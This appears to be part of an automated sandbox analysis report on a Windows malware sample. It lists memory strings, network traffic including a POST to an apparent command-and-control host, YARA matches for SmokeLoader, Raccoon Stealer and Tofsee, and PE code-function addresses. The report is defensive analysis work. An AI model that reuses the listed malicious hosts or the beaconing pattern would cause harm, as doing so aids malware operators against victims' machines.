                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
                          Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmpString found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkoyuevdx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49792 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49811 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49896 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49947 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          Yara detected SmokeLoader
                          Source: Yara matchFile source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: 86C4.exe, 00000015.00000002.803047827.00000000007FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          Yara detected Raccoon Stealer
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          Yara detected Tofsee
                          Source: Yara matchFile source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR

                          System Summary:

PE file has nameless sections
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: ACEF.exe.7.dr | Static PE information: section name:
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_004100FB
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00411D61
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00411125
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00411669
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_004046DE
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00410BE1
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00412BF3
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00533253
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_005331FF
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00402A5F
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00402AB3
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_00402A5F
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_00402AB3
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00402A5F
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00402AB3
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_00402A5F
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_00402B2E
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_00411065
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_00412A02
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_0040CAC5
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_00410B21
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Code function: 14_2_004115A9
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00402A5F
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00410800
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_00411280
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_004103F0
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: 20_2_004109F0
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_0040C913
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_031996F0
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_03190470
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_03190462
